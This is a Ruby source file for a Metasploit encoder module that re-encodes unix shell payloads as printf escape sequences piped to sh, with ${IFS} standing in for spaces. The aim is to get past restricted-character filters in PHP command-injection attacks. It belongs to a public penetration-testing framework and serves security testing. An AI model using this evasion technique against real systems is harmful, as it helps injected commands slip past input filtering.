## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Encoder # Has some issues, but overall it's pretty good # - printf(1) may not be available # - requires: "\x7c\x73\x68\x5c\x78" # - doesn't work on windows # - min size increase: 4x + 9 # - max size increase: 4x + 14 # However, because it intentionally leaves backslashes unescaped (assuming # that PHP's magic_quotes_gpc will take care of escaping them) it is # unsuitable for most exploits. Rank = ManualRanking def initialize super( 'Name' => 'printf(1) via PHP magic_quotes Utility Command Encoder', 'Description' => %q{ This encoder uses the printf(1) utility to avoid restricted characters. Some shell variable substituion may also be used if needed symbols are blacklisted. Some characters are intentionally left unescaped since it is assummed that PHP with magic_quotes_gpc enabled will escape them during request handling. }, 'Author' => 'jduck', 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'EncoderType' => Msf::Encoder::Type::PrintfPHPMagicQuotes) end # # Encodes the payload # def encode_block(state, buf) # Skip encoding for empty badchars if(state.badchars.length == 0) return buf end # If backslash is bad, we are screwed. if (state.badchars.include?("\\")) or (state.badchars.include?("|")) or # We must have at least ONE of these two.. (state.badchars.include?("x") and state.badchars.include?("0")) raise RuntimeError end # Now we build a string of the original payload with bad characters # into \0 or \x if (state.badchars.include?('x')) hex = buf.unpack('C*').collect { |c| "\\0%o" % c }.join else hex = buf.unpack('C*').collect { |c| "\\x%x" % c }.join end # Build the final output ret = "printf" # Special case: , try to use ${IFS} if (state.badchars.include?(" ")) ret << '${IFS}' else ret << " " end ret << hex << "|sh" return ret end end